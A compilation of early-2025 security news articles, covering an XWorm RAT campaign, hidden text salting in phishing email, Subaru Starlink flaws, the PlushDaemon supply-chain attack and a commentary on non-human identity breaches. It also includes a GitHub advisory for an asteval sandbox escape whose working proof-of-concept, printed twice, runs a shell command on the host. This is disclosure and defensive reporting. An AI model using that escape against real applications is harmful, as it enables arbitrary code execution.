Crooks pwning crooks – Hackers exploit script kiddies with XWorm RAT, compromising 18,000+ devices globally and stealing sensitive…

Crooks pwning crooks – Hackers exploit script kiddies with XWorm RAT, compromising 18,000+ devices globally and stealing sensitive data via Telegram-based C&C.

CloudSEK has discovered a new campaign involving a Trojanized version of the **XWorm RAT** builder. The malware spread through various channels, including file-sharing services (like Mega and Upload.ee), Github repositories (such as LifelsHex/FastCryptor and FullPenetrationTesting/888-RAT), Telegram channels (including HAX\_CRYPT and inheritedeu), and even Youtube and other websites. 

This campaign resulted in compromising over 18,459 devices globally. The stolen data included sensitive information like browser credentials, Discord tokens, Telegram data, and system information from the compromised devices.

“This builder provides attackers with a streamlined tool to deploy and operate a highly capable RAT, which features advanced capabilities like system reconnaissance, data exfiltration, and command execution,” CloudSEK’s **blog post** authored by the company’s Threat Intelligence Researcher, Vikas Kundu, revealed.

Threat actors specifically distributed a modified XWorm RAT builder to target inexperienced attackers (aka **Script Kiddies**). Once installed, the malware exfiltrated sensitive data like browser credentials, Discord tokens, Telegram data, and system information from the victim’s device. It also boasted advanced features like virtualization checks, the ability to modify the registry, and extensive command and control capabilities.

Furthermore, this malware relies on Telegram for its command and control functionality. It used bot tokens and Telegram API calls to receive commands from the attacker and exfiltrate stolen data.

Researchers were able to identify and leverage a “kill switch” functionality within the malware. This functionality was used to disrupt operations on active devices infected with the malware. However, this approach had limitations. Offline machines and Telegram’s rate limiting mechanisms prevented complete disruption.

Based on the investigation, researchers were able to link the threat actor to aliases “@shinyenigma” and “@milleniumrat.” Additionally, they were able to identify associated GitHub accounts and a ProtonMail address.

It is worth noting that XWorm has become a persistent threat with Ukraine’s State Service of Special Communications and Information Protection (SSSCIP) **reporting** its usage in Russian cyber operations against Ukraine in the first half of 2024. 

To protect against such threats, organizations and individuals should use Endpoint Detection and Response (EDR) solutions to detect suspicious network activity and even malware identification.

Additionally, network monitoring using Intrusion Detection and Prevention Systems (IDPS) can block communication between infected devices and the malicious C&C server on Telegram. Proactive measures like blocking access to known malicious URLs and enforcing application whitelisting can prevent malware from being downloaded and executed.

**RELATED ARTICLES**

1.  **P2PInfect: Self-Replicating Worm Hits Redis Instances**
2.  **FBI Warns of HiatusRAT Malware Targeting Webcams and DVRs**
3.  **Fake 7-Zip Exploit Code Traced to AI-Generated Misinterpretation**
4.  **NPM Package Disguised as an Ethereum Tool Deploys Quasar RAT**
5.  **Black Basta-Style Attack Hits Inboxes with 1,165 Emails in 90 Minutes**

Hackers Use XWorm RAT to Exploit Script Kiddies, Pwning 18,000 Devices

Hidden text salting is a simple yet effective technique for bypassing email parsers, confusing spam filters, and evading detection engines that rely on keywords. Cisco Talos has observed an increase in the number of email threats leveraging hidden text salting.

Friday, January 24, 2025 08:37

*   Cisco Talos observed an increase in the number of email threats leveraging hidden text salting (also known as "poisoning") in the second half of 2024.
*   Hidden text salting is a simple yet effective technique for bypassing email parsers, confusing spam filters, and evading detection engines that rely on keywords. The idea is to include some characters into the HTML source of an email that are not visually recognizable.
*   Talos observed this technique being used for various purposes, including evading brand name extraction by email parsers, confusing language detection procedures, and evading spam filters and detection engines in HTML smuggling.

**Introduction to hidden text salting**

Hidden text salting (or "poisoning") is an effective technique employed by threat actors to craft emails that can evade parsers, confuse spam filters, and bypass detection systems that rely on keywords. In this approach, features of the Hypertext Markup Language (HTML) and Cascading Style Sheets (CSS) are used to include comments and irrelevant content that are not visible to the victim when the email is rendered in an email client but can impact the efficacy of parsers and detection engines.

Due to the simplicity of hidden text salting and the number of ways threat actors can insert gibberish content in emails, this approach can introduce significant challenges to email parsers, spam filters, and detection engines.

**Technical explanation**

Talos has observed the use of hidden text salting for multiple purposes, such as evading brand name extraction by email parsers. Below is an example of a phishing email that impersonates the Wells Fargo brand.

A phishing email impersonating the Wells Fargo brand.

The HTML source of the above email is shown below. The **<style>** tag is used to define style information for an email via CSS. Inside the **<style>** element, one can specify how HTML elements should render in a browser or email client. The **<style>** element must be included inside the **<head>** section of the document. In this example, threat actors have set the **display** property to **inline-block**. When **inline-block** is used instead of **inline**, one can set a width and height on the element. In this case, the block’s width is set to zero. Additionally, the **overflow** property is set to “hidden,” resulting in the content outside the element box not being shown to the victim when the email is rendered in the email client.

The HTML source snippet of the above phishing email shows how the 'width' property in CSS is used to hide the irrelevant characters inserted between the letters of the Wells Fargo brand.

As a second example, the following email shows a phishing email, sent to another customer, that impersonates the Norton LifeLock brand.

A phishing email impersonating the Norton LifeLock brand.

In this case, threat actors have inserted Zero-Width SPace (ZWSP) and Zero-Width Non-Joiner (ZWNJ) characters between the letters of Norton LifeLock to evade detection. Although these characters are not visible to the naked eye, they are still considered characters or strings of characters by most email parsers. Therefore, one can consider them invisible characters.

The HTML source snippet of the above phishing email, with Zero-Width SPace (ZWSP) and Zero-Width Non-Joiner (ZWNJ) characters inserted between the letters of the Norton LifeLock brand.

Hidden text salting has also been used to confuse language detection procedures, thus evading possible spam filters that rely on such procedures. The example below shows a phishing email that impersonates the Harbor Freight brand. As it is visually obvious, the language of this email is English.

A phishing email impersonating the Harbor Freight brand.

However, a closer inspection of the email’s headers shows that the language of this email has been identified as French, as it is saved in the **LANG** field of Microsoft's **X-Forefront-Antispam-Report anti-spam** header. The LANG field specifies the language in which the message was written, and the **X-Forefront-Antispam-Report** header contains information about the message and how it was processed. This header is added to each message by Exchange Online Protection (EOP), Microsoft's cloud-based filtering service.

A snippet of the above email’s header shows French as the identified language of this email by Microsoft's cloud-based filtering service, called EOP.

When the HTML source of this email is inspected, several French words and sentences are found that are visually hidden. In this case, threat actors have used the **display** property of the **div** element to hide the French words, thus confusing the language detection module of Microsoft.

The HTML source snippet of the above phishing email, with French characters that are hidden using the display property.

Another case where hidden text salting has been used is in HTML smuggling in order to bypass detection engines (see the example below).

A spear phishing email with an HTML attachment.

A snippet of the HTML attachment from the above email is shown below. Threat actors have inserted multiple irrelevant comments between the base64-encoded characters to prevent file attachment parsers from easily putting these strings together and decoding them.

The HTML source snippet of the above phishing email, with irrelevant comments inserted between the base64-encoded characters.

**Mitigation**

The above cases are just a few examples demonstrating how simple and effective this technique is in evading detection. Detecting email content concealed through this technique, which is used to poison the HTML source of an email, is important since it poses significant challenges in identifying email threats that leverage this method. A few mitigation and detection strategies are discussed below that could be helpful in this mission.

**Advanced filtering techniques**: One mitigation strategy is to investigate and develop advanced filtering techniques that can more effectively detect hidden text salting and content concealment. For example, filtering systems could be made to identify questionable usage of CSS properties like visibility (e.g., "visibility: hidden") and display (e.g., "display: none") that are frequently used to conceal text. These systems could also examine the structure of the HTML source of emails to find the excessive use of inline styles or unusual nesting of elements that might suggest an effort to hide content.

**Relying on visual features**: Although improved filtering systems can be very useful in detecting hidden text salting and email threats that use this technique to avoid detection, threat actors can swiftly develop new techniques. Therefore, relying on some features in addition to the text domain, such as the visual characteristics of emails, could be helpful.

**Protection**

Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI powered detections. Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats. This differentiated AI technology also extracts and analyzes the _content_ of image-only emails that aim to evade text-based detections.

Secure Email Threat Defense identifies malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack.  

Start fortifying your environment against advanced threats. Sign up for a free trial of Email Threat Defense today.

Seasoning email threats with hidden text salting

### Summary
If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.

### Details
The vulnerability is rooted in how `asteval` performs attribute access verification. In particular, the [`on_attribute`](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L565) node handler prevents access to attributes that are either present in the `UNSAFE_ATTRS` list or are formed by names starting and ending with `__`, as shown in the code snippet below:

```py
    def on_attribute(self, node):    # ('value', 'attr', 'ctx')
        """Extract attribute."""

        ctx = node.ctx.__class__
        if ctx == ast.Store:
            msg = "attribute for storage: shouldn't be here!"
            self.raise_exception(node, exc=RuntimeError, msg=msg)

        sym = self.run(node.value)
        if ctx == ast.Del:
            return delattr(sym, node.attr)
        #
        unsafe = (node.attr in UNSAFE_ATTRS or
                 (node.attr.startswith('__') and node.attr.endswith('__')))
        if not unsafe:
            for dtype, attrlist in UNSAFE_ATTRS_DTYPES.items():
                unsafe = isinstance(sym, dtype) and node.attr in attrlist
                if unsafe:
                    break
        if unsafe:
            msg = f"no safe attribute '{node.attr}' for {repr(sym)}"
            self.raise_exception(node, exc=AttributeError, msg=msg)
        else:
            try:
                return getattr(sym, node.attr)
            except AttributeError:
                pass
```

While this check is intended to block access to sensitive Python dunder methods (such as `__getattribute__`), the flaw arises because instances of the `Procedure` class expose their AST (stored in the `body` attribute) without proper protection:

```py
class Procedure:
    """Procedure: user-defined function for asteval.

    This stores the parsed ast nodes as from the 'functiondef' ast node
    for later evaluation.

    """

    def __init__(self, name, interp, doc=None, lineno=0,
                 body=None, args=None, kwargs=None,
                 vararg=None, varkws=None):
        """TODO: docstring in public method."""
        self.__ininit__ = True
        self.name = name
        self.__name__ = self.name
        self.__asteval__ = interp
        self.raise_exc = self.__asteval__.raise_exception
        self.__doc__ = doc
        self.body = body
        self.argnames = args
        self.kwargs = kwargs
        self.vararg = vararg
        self.varkws = varkws
        self.lineno = lineno
        self.__ininit__ = False
```

Since the `body` attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a `Procedure` during runtime to leverage unintended behaviour.

The exploit works as follows:

1. **The Time of Check, Time of Use (TOCTOU) Gadget:**

   In the [code](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L577) below, a variable named `unsafe` is set based on whether `node.attr` is considered unsafe:

   ```python
   unsafe = (node.attr in UNSAFE_ATTRS or
             (node.attr.startswith('__') and node.attr.endswith('__')))
   ```

2. **Exploiting the TOCTOU Gadget:**

   An attacker can abuse this gadget by hooking any `Attribute` AST node that is not in the `UNSAFE_ATTRS` list. The attacker modifies the `node.attr.startswith` function so that it points to a custom procedure. This custom procedure performs the following steps:
   
   - It replaces the value of `node.attr` with the string `"__getattribute__"` and returns `False`.
   - Thus, when `node.attr.startswith('__')` is evaluated, it returns `False`, which causes the condition to short-circuit and sets `unsafe` to `False`.
   - However, by that time, `node.attr` has been changed to `"__getattribute__"`, which will be used in the subsequent `getattr(sym, node.attr)` call. An attacker can then use the obtained reference to `sym.__getattr__`to retrieve malicious attributes without needing to pass the `on_attribute` checks.

### PoC
The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:

```py
from asteval import Interpreter
aeval = Interpreter()
code = """
ga_str = "__getattribute__"
def lender():
    a
    b
def pwn():
    ga = lender.dontcare
    init = ga("__init__")
    ga = init.dontcare
    globals = ga("__globals__")
    builtins = globals["__builtins__"]
    importer = builtins["__import__"]
    importer("os").system("whoami")

def startswith1(str):
    # Replace the attr on the targeted AST node with "__getattribute__"
    pwn.body[0].value.attr = ga_str
    return False    

def startswith2(str):
    pwn.body[2].value.attr = ga_str
    return False    

n1 = lender.body[0]
n1.startswith = startswith1
pwn.body[0].value.attr = n1

n2 = lender.body[1]
n2.startswith = startswith2
pwn.body[2].value.attr = n2

pwn()
"""
aeval(code)
```

**Summary**

If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.

**Details**

The vulnerability is rooted in how asteval performs attribute access verification. In particular, the on_attribute node handler prevents access to attributes that are either present in the UNSAFE_ATTRS list or are formed by names starting and ending with __, as shown in the code snippet below:

    def on\_attribute(self, node):    \# ('value', 'attr', 'ctx')
        """Extract attribute."""

        ctx \= node.ctx.\_\_class\_\_
        if ctx \== ast.Store:
            msg \= "attribute for storage: shouldn't be here!"
            self.raise\_exception(node, exc\=RuntimeError, msg\=msg)

        sym \= self.run(node.value)
        if ctx \== ast.Del:
            return delattr(sym, node.attr)
        #
        unsafe \= (node.attr in UNSAFE\_ATTRS or
                 (node.attr.startswith('\_\_') and node.attr.endswith('\_\_')))
        if not unsafe:
            for dtype, attrlist in UNSAFE\_ATTRS\_DTYPES.items():
                unsafe \= isinstance(sym, dtype) and node.attr in attrlist
                if unsafe:
                    break
        if unsafe:
            msg \= f"no safe attribute '{node.attr}' for {repr(sym)}"
            self.raise\_exception(node, exc\=AttributeError, msg\=msg)
        else:
            try:
                return getattr(sym, node.attr)
            except AttributeError:
                pass

While this check is intended to block access to sensitive Python dunder methods (such as __getattribute__), the flaw arises because instances of the Procedure class expose their AST (stored in the body attribute) without proper protection:

class Procedure:
    """Procedure: user-defined function for asteval.
    This stores the parsed ast nodes as from the 'functiondef' ast node
    for later evaluation.
    """

    def \_\_init\_\_(self, name, interp, doc\=None, lineno\=0,
                 body\=None, args\=None, kwargs\=None,
                 vararg\=None, varkws\=None):
        """TODO: docstring in public method."""
        self.\_\_ininit\_\_ \= True
        self.name \= name
        self.\_\_name\_\_ \= self.name
        self.\_\_asteval\_\_ \= interp
        self.raise\_exc \= self.\_\_asteval\_\_.raise\_exception
        self.\_\_doc\_\_ \= doc
        self.body \= body
        self.argnames \= args
        self.kwargs \= kwargs
        self.vararg \= vararg
        self.varkws \= varkws
        self.lineno \= lineno
        self.\_\_ininit\_\_ \= False

Since the body attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a Procedure during runtime to leverage unintended behaviour.

The exploit works as follows:

1.  **The Time of Check, Time of Use (TOCTOU) Gadget:**
    
    In the code below, a variable named unsafe is set based on whether node.attr is considered unsafe:
    
    unsafe \= (node.attr in UNSAFE\_ATTRS or
              (node.attr.startswith('\_\_') and node.attr.endswith('\_\_')))
    
2.  **Exploiting the TOCTOU Gadget:**
    
    An attacker can abuse this gadget by hooking any Attribute AST node that is not in the UNSAFE_ATTRS list. The attacker modifies the node.attr.startswith function so that it points to a custom procedure. This custom procedure performs the following steps:
    
    *   It replaces the value of node.attr with the string "__getattribute__" and returns False.
    *   Thus, when node.attr.startswith('__') is evaluated, it returns False, which causes the condition to short-circuit and sets unsafe to False.
    *   However, by that time, node.attr has been changed to "__getattribute__", which will be used in the subsequent getattr(sym, node.attr) call. An attacker can then use the obtained reference to sym.__getattr__to retrieve malicious attributes without needing to pass the on_attribute checks.

**PoC**

The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the whoami command on the host machine:

from asteval import Interpreter
aeval \= Interpreter()
code \= """
ga\_str = "\_\_getattribute\_\_"
def lender():
    a
    b
def pwn():
    ga = lender.dontcare
    init = ga("\_\_init\_\_")
    ga = init.dontcare
    globals = ga("\_\_globals\_\_")
    builtins = globals\["\_\_builtins\_\_"\]
    importer = builtins\["\_\_import\_\_"\]
    importer("os").system("whoami")
def startswith1(str):
    # Replace the attr on the targeted AST node with "\_\_getattribute\_\_"
    pwn.body\[0\].value.attr = ga\_str
    return False    
def startswith2(str):
    pwn.body\[2\].value.attr = ga\_str
    return False    
n1 = lender.body\[0\]
n1.startswith = startswith1
pwn.body\[0\].value.attr = n1
n2 = lender.body\[1\]
n2.startswith = startswith2
pwn.body\[2\].value.attr = n2
pwn()
"""
aeval(code)

**References**

*   GHSA-vp47-9734-prjw
*   lmfit/asteval@45bb475

GHSA-vp47-9734-prjw: ASTEVAL Allows Malicious Tampering of Exposed AST Nodes Leads to Sandbox Escape

PRESS RELEASE

AUSTIN, TX, Jan. 21, 2025 (GLOBE NEWSWIRE) -- Automox launches FastAgent, a breakthrough in modern agent technology designed to deliver unprecedented speed, reliability, and control for IT professionals. 

With reimagined communication protocols, infrastructure, and user-facing functionality, FastAgent modernizes endpoint management to meet the evolving demands of secure enterprise environments.

"FastAgent represents a significant leap forward for IT teams seeking uncompromising reliability and empowered endpoint control," said Jason Kikta, CISO/VP of Product at Automox. "This innovation demonstrates our commitment to simplifying IT operations without sacrificing security or speed."

Key Innovations of FastAgent:

*   Industry-Leading Reliability: Agent-aware command tracking and hyper-efficient backend communication protocols ensure consistent, secure, device-centric management across Windows, macOS, and Linux systems. Persistent outgoing response queuing enables the agent to operate intelligently, even in high-traffic or intermittent connectivity situations. 
    
*   Unparalleled Scalability and Control: FastAgent enhances reliability without compromising security policies. With dynamic reconnection delay, configuration IT teams can tailor agent reconnection attempts for environments with strict network policies, such as those using network access control (NAC) solutions, to maximize reliability and connectivity between Automox and devices. 
    
*   Intuitive User Experience with Automox Tray: Automox Tray provides end users with an intuitive, familiar, and friendly interface for managing system updates and device reboots. This innovative experience maintains security SLAs while delivering transparency and control to end users. 
    

FastAgent's advanced capabilities are built to scale, offering IT decision-makers certainty in maintaining secure, efficient, and consistent configurations across all their Windows, macOS, and Linux endpoints.

Up Next: End-User Empowerment with Automox Tray

Automox Tray redefines the end-user experience between IT and the workforce with an approachable, modern notification system for Windows, macOS, and third-party updates. IT teams can implement deadline-based notifications to streamline updates and reboot processes while ensuring business-critical systems stay compliant and secure.

Enhanced IT Efficiency with Automox FastAgent

FastAgent brings a comprehensive set of industry-leading capabilities:

1.  Redesigned Backend Protocols ensure scalability and low latency. 
    
2.  Persistent Response Queuing enables command delivery under any network condition. 
    
3.  Enhanced Security Controls allow configurable reconnection delays to improve stability in highly controlled environments. 
    

By combining enhanced functionality with industry-leading automation, FastAgent empowers organizations to address key IT challenges, maintain compliance, and improve operational efficiency.

About Automox

Automox is the IT automation platform for modern organizations. Policy-driven human-controlled automation empowers IT professionals to prove vulnerabilities are fixed, slash cost and complexity, win back hours in their days, and delight end users. 360+ Automox Worklet automation scripts make it easy for IT to save time, reduce risk, and thoughtfully automate OS, third-party software, and configuration updates on Windows, macOS, and Linux desktops, laptops, and servers.

Join thousands of IT heroes automating confidence across millions of endpoints with Automox. Learn more at www.automox.com, connect with the Automox Community, or connect with us on Twitter/X, Threads, LinkedIn, Facebook, Reddit, or Instagram.

Automox Releases Endpoint Management With FastAgent

Now-fixed web bugs allowed hackers to remotely unlock and start any of millions of Subarus. More disturbingly, they could also access at least a year of cars’ location histories—and Subaru employees still can.

About a year ago, security researcher Sam Curry bought his mother a Subaru, on the condition that, at some point in the near future, she let him hack it.

It took Curry until last November, when he was home for Thanksgiving, to begin examining the 2023 Impreza's internet-connected features and start looking for ways to exploit them. Sure enough, he and a researcher working with him online, Shubham Shah, soon discovered vulnerabilities in a Subaru web portal that let them hijack the ability to unlock the car, honk its horn, and start its ignition, reassigning control of those features to any phone or computer they chose.

Most disturbing for Curry, though, was that they found they could also track the Subaru's location—not merely where it was at the moment but also where it had been for the entire year that his mother had owned it. The map of the car’s whereabouts was so accurate and detailed, Curry says, that he was able to see her doctor visits, the homes of the friends she visited, even which exact parking space his mother parked in every time she went to church.

A year of location data for Sam Curry’s mother’s 2023 Subaru Impreza that Curry and Shah were able to access in Subaru’s employee admin portal thanks to its security vulnerabilities.

Screenshot Courtesy of Sam Curry

“You can retrieve at least a year's worth of location history for the car, where it's pinged precisely, sometimes multiple times a day,” Curry says. “Whether somebody's cheating on their wife or getting an abortion or part of some political group, there are a million scenarios where you could weaponize this against someone.”

Curry and Shah today revealed in a blog post their method for hacking and tracking millions of Subarus, which they believe would have allowed hackers to target any of the company's vehicles equipped with its digital features known as Starlink in the US, Canada, or Japan. Vulnerabilities they found in a Subaru website intended for the company's staff allowed them to hijack an employee's account to both reassign control of cars’ Starlink features and also access all the vehicle location data available to employees, including the car’s location every time its engine started, as shown in their video below.

Curry and Shah reported their findings to Subaru in late November, and Subaru quickly patched its Starlink security flaws. But the researchers warn that the Subaru web vulnerabilities are just the latest in a long series of similar web-based flaws they and other security researchers working with them have found that have affected well over a dozen carmakers, including Acura, Genesis, Honda, Hyundai, Infiniti, Kia, Toyota, and many others. There’s little doubt, they say, that similarly serious hackable bugs exist in other auto companies' web tools that have yet to be discovered.

In Subaru's case, in particular, they also point out that their discovery hints at how pervasively those with access to Subaru's portal can track its customers' movements, a privacy issue that will last far longer than the web vulnerabilities that exposed it. “The thing is, even though this is patched, this functionality is still going to exist for Subaru employees,” Curry says. “It's just normal functionality that an employee can pull up a year's worth of your location history.”

When WIRED reached out to Subaru for comment on Curry and Shah's findings, a spokesperson responded in a statement that “after being notified by independent security researchers, \[Subaru\] discovered a vulnerability in its Starlink service that could potentially allow a third party to access Starlink accounts. The vulnerability was immediately closed and no customer information was ever accessed without authorization.”

The Subaru spokesperson also confirmed to WIRED that “there are employees at Subaru of America, based on their job relevancy, who can access location data." The company offered as an example that employees have that access to share a vehicle's location with first responders in the case when a collision is detected. “All these individuals receive proper training and are required to sign appropriate privacy, security, and NDA agreements as needed,” Subaru's statement added. “These systems have security monitoring solutions in place which are continually evolving to meet modern cyber threats.”

Responding to Subaru's example of notifying first responders about a collision, Curry notes that would hardly require a year's worth of location history. The company didn't respond to WIRED asking how far back it keeps customers' location histories and makes them available to employees.

Shah and Curry's research that led them to the discovery of Subaru's vulnerabilities began when they found that Curry's mother's Starlink app connected to the domain SubaruCS.com, which they realized was an administrative domain for employees. Scouring that site for security flaws, they found that they could reset employees' passwords simply by guessing their email address, which gave them the ability to take over any employee's account whose email they could find. The password reset functionality did ask for answers to two security questions, but they found that those answers were checked with code that ran locally in a user's browser, not on Subaru's server, allowing the safeguard to be easily bypassed. “There were really multiple systemic failures that led to this,” Shah says.

The two researchers say they found the email address for a Subaru Starlink developer on LinkedIn, took over the employee's account, and immediately found that they could use that staffer's access to look up any Subaru owner by last name, zip code, email address, phone number, or license plate to access their Starlink configurations. In seconds, they could then reassign control of the Starlink features of that user's vehicle, including the ability to remotely unlock the car, honk its horn, start its ignition, or locate it, as shown in the video below.

Those vulnerabilities alone, for drivers, present serious theft and safety risks. Curry and Shah point out that a hacker could have targeted a victim for stalking or theft, looked up someone's vehicle's location, then unlocked their car at any time—though a thief would have to somehow also use a separate technique to disable the car's immobilizer, the component that prevents it from being driven away without a key.

Those car hacking and tracking techniques alone are far from unique. Last summer, Curry and another researcher, Neiko Rivera, demonstrated to WIRED that they could pull off a similar trick with any of millions of vehicles sold by Kia. Over the prior two years, a larger group of researchers, of which Curry and Shah are a part, discovered web-based security vulnerabilities that affected cars sold by Acura, BMW, Ferrari, Genesis, Honda, Hyundai, Infiniti, Mercedes-Benz, Nissan, Rolls Royce, and Toyota.

More unusual in Subaru's case, Curry and Shah say, is that they were able to access fine-grained, historical location data for Subarus going back at least a year. Subaru may in fact collect multiple years of location data, but Curry and Shah tested their technique only on Curry's mother, who had owned her Subaru for about a year.

Curry argues that Subaru's extensive location tracking is a particularly disturbing demonstration of the car industry's lack of privacy safeguards around its growing collection of personal data on drivers. “It's kind of bonkers,” he says. “There's an expectation that a Google employee isn't going to be able to just go through your emails in Gmail, but there's literally a button on Subaru's admin panel that lets an employee view location history.”

The two researchers’ work contributes to a growing sense of concern over the enormous amount of location data that car companies collect. In December, information a whistleblower provided to the German hacker collective the Chaos Computer Computer and Der Spiegel revealed that Cariad, a software company that partners with Volkswagen, had left detailed location data for 800,000 electric vehicles publicly exposed online. Privacy researchers at the Mozilla Foundation in September warned in a report that “modern cars are a privacy nightmare,” noting that 92 percent give car owners little to no control over the data they collect, and 84 percent reserve the right to sell or share your information. (Subaru tells WIRED that it “does not sell location data.”)

“While we worried that our doorbells and watches that connect to the internet might be spying on us, car brands quietly entered the data business by turning their vehicles into powerful data-gobbling machines,” Mozilla's report reads.

Curry and Shah's discovery of Subaru's security vulnerabilities in its tracking demonstrate a particularly egregious exposure of that data—but also a privacy problem that's hardly less disturbing now that the vulnerabilities are patched, says Robert Herrell, the executive director of the Consumer Federation of California, which has sought to create legislation for limiting car's data tracking.

“It seems like there are a bunch of employees at Subaru that have a scary amount of detailed information,” Herrell says. “People are being tracked in ways that they have no idea are happening.”

_Update 4:23 pm EST, January 23, 2025: The article's subheadline has been updated to clarify the scope of the researcher's work._

Subaru Security Flaws Exposed Its System for Tracking Millions of Cars

Advanced persistent threat group PlushDaemon, active since 2019, is using a sophisticated modular backdoor to collect data from infected systems in South Korea.

Source: BeeBright via Shutterstock

A newly discovered Chinese threat group has targeted a South Korean VPN developer with a supply chain attack aimed at deploying a custom backdoor to collect data for cyber-espionage purposes.

The group, dubbed PlushDaemon by the researchers at ESET Research who discovered it, typically aims to hijack legitimate updates of Chinese applications in its malicious operations "by redirecting traffic to attacker-controlled servers," according to a blog post by ESET researcher Facundo Muñoz published on Jan. 22. "Additionally, we have observed the group gaining access via vulnerabilities in legitimate web servers," he wrote.

However, the researchers also discovered the group in May 2024 planting malicious code in an NSIS installer for the Windows version of the VPN software of South Korean company IPany, representing a departure from its typical operations, they said. ESET notified IPany and the malicious installer was removed from the company's website.

PlushDaemon has been active since at least 2019, engaging in cyberespionage operations against individuals and entities in mainland China, Taiwan, Hong Kong, South Korea, the US, and New Zealand. The group is the exclusive user of several types of malware in its malicious activities, mostly notably a custom, modular backdoor for collecting various data from infected machines, called SlowStepper for Windows, according to ESET.

**Atypical Supply-Chain Attack**

The first sign of the supply-chain attack came in May 2024, when ESET researchers noticed detections of malicious code in an NSIS installer for Windows that users from South Korea had downloaded from the IPany website.

"The victims appear to have manually downloaded a ZIP archive containing a malicious NSIS installer from the URL https://ipany\[.\]kr/download/IPanyVPNsetup.zip," Muñoz wrote. However, the researchers didn't find suspicious code on the download page "to produce targeted downloads, for example by geofencing to specific targeted regions or IP ranges." This led them to believe that "anyone using the IPany VPN might have been a valid target."

Several users attempted to install the Trojanized software in the network of a semiconductor company and an unidentified software development company in South Korea. Further research found even older cases of infection via the campaign, with the two oldest coming from a victim in Japan in November 2023 and a victim in China in December 2023, the researchers said.

**SlowStepper Backdoor**

The payload in the supply chain attack is PlushDaemon's own SlowStepper backdoor, which has more than 30 modules. However, the group used a "lite" version of the backdoor in the IPany attack, which contains fewer features than other previous and newer versions, the researchers said.

The backdoor features a multistage command-and-control (C2) protocol using DNS, and is known for its ability to download and execute dozens of additional Python modules with espionage capabilities.

"Both the full and Lite versions make use of an array of tools programmed in Python and Go, which include capabilities for extensive collection of data, and spying through recording of audio and videos," Muñoz wrote.

The researchers found PlushDaemon's tools stored in a remote code repository hosted on the Chinese platform GitCode, under the LetMeGo22 account. At the time of writing, the profile was private.

**Another Chinese APT Emerges**

China already has a raft of known and active APTs that regularly and persistently engage in cyberespionage activities against the US and its allies. One of the most notable operations of late was the infiltration of US broadband provider networks by Chinese APT Salt Typhoon; however, the investigation into that incident was dealt a significant blow on Jan. 21, when President Trump, on his second day back in office, fired the cyber safety board looking into it.

However, with a new, sophisticated actor like PlushDaemon now emerging from the shadows, organizations need to be more vigilant than ever against malicious cyber activity from China, Muñoz said.

"The numerous components in the PlushDaemon toolset and its rich version history show that, while previously unknown, this China-aligned APT group has been operating diligently to develop a wide array of tools, making it a significant threat to watch for," he wrote.

To that end, ESET included a link to its GitHub repository that contains a comprehensive list of indicators of compromise (IoCs) and samples of PlushDaemon activity.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Chinese Cyberspies Target South Korean VPN in Supply Chain Attack

The flurry of non-human identity attacks at the end of 2024 demonstrates extremely strong momentum heading into the new year. That does not bode well.

Itzik Alvas, Co-Founder & CEO, Entro Security

January 22, 2025

3 Min Read

Source: Brain light via Alamy Stock Photo

COMMENTARY

A look back at 2024's top non-human identity (NHI) attacks and their year-end explosion sends a worrying signal that 2025 is going to be a tough year for machine-to-machine identity theft.

One year ago, NHI burst onto the scene with a big warning flare, when Cloudflare disclosed that NHI mismanagement caused a massive breach, stemming from the failure to rotate an access token and account credentials exposed in the 2023 Okta compromise. 

While the attack was contained, the impact on Cloudflare was nonetheless significant. The company disclosed it had to rotate every production credential (more than 5,000 individual credentials), physically segment test and staging systems, perform forensic triages on 4,893 systems, and then reimage and reboot every machine in its global network.

As the year progressed, NHI breaches gained momentum.

In June, the New York Times made its own news when 270GB of its internal data and applications in 5,000 repositories were stolen from GitHub and published on the Web. 

How? The breach was executed using NHI when an exposed GitHub Personal Access Token, a machine-to-machine secret, allowed unauthorized access to the company's code repositories. The "All the News That's Fit to Print" outlet downplayed the story. Cybersecurity experts did not agree, however, arguing that source-code leaks can have wide-ranging implications.

**High-Profile Breach Disclosures**

The year ended with a spate of high-profile breach disclosures attributed to NHI during the fourth quarter. 

Thousands of online stores running Adobe Commerce (formerly Magento) software were hacked and infected with digital payment skimmers. The NHI attack used stolen cryptographic keys to generate an application programming interface (API) authorization token, enabling the attacker to access private customer data and insert payment skimmers into the checkout process.

AWS and Microsoft Azure machine-to-machine authentication keys found in Android and iOS apps used by millions were compromised, exposing user data and source code to security breaches. Exposing this type of credential can easily lead to unauthorized access to storage buckets and databases with sensitive user data. Apart from this, attackers could use them to manipulate or steal data.

Schneider Electric confirmed its development platform was breached after a hacker used exposed Jira credentials to steal data. The hacker gloated that the breach compromised critical data, including projects, issues and plug-ins, along with over 400,000 rows of user data, totaling more than 40GB of compressed data,

The Cybersecurity and Infrastructure Security Agency (CISA) warned that attackers were exploiting a critical missing authentication vulnerability in Palo Alto Networks Expedition, a migration tool that can help convert firewall configuration from Checkpoint, Cisco, and other vendors to PAN-OS. This security flaw enabled threat actors to remotely exploit it to reset application admin credentials on Internet-exposed Expedition servers.

A new sophisticated phishing tool targeting GitHub users was also revealed in the fourth quarter. It posed a significant threat to developers and organizations worldwide. Here's how this relates to NHIs: Bots used a compromised secret and set of permissions associated with that credential as the ingredients to make the API calls and create comments using a script.

The comments themselves convinced developers to use insecure scripts as validated solutions.

